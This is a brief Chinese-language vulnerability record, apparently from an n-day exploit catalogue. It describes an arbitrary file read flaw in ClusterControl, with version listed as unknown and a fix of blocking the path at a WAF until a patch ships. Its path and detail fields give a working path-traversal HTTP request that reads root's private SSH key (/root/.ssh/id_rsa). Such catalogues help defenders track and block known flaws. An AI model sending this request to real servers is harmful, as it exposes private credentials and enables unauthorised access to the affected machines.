vendor = "ClusterControl"
name = "ClusterControl存在任意文件读取漏洞"
type = "任意文件读取"
version = "未知"
path = "/../../../../../../../../..//root/.ssh/id_rsa"
detail = "GET /../../../../../../../../..//root/.ssh/id_rsa HTTP/1.1"
fix = "WAF封禁路路径，等待发布补丁"
date = "0807"
label = "nday"
